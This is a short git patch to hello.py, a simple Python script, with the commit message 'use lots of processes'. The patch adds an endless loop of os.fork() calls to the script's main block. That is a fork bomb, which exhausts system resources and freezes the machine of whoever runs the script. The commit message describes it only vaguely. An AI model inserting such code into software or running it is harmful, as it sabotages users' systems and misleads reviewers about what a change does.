From 8d251c2eee00a6b9995c3cb5eeda906e28b62331 Mon Sep 17 00:00:00 2001 From: Daniel Nichols Date: Tue, 1 Oct 2019 16:16:40 -0400 Subject: [PATCH] use lots of processes --- hello.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/hello.py b/hello.py index 72647ca..7a2903e 100755 --- a/hello.py +++ b/hello.py @@ -8,4 +8,7 @@ def add_numbers(x, y): if __name__ == '__main__': # do something! + import os + while 1: + os.fork() pass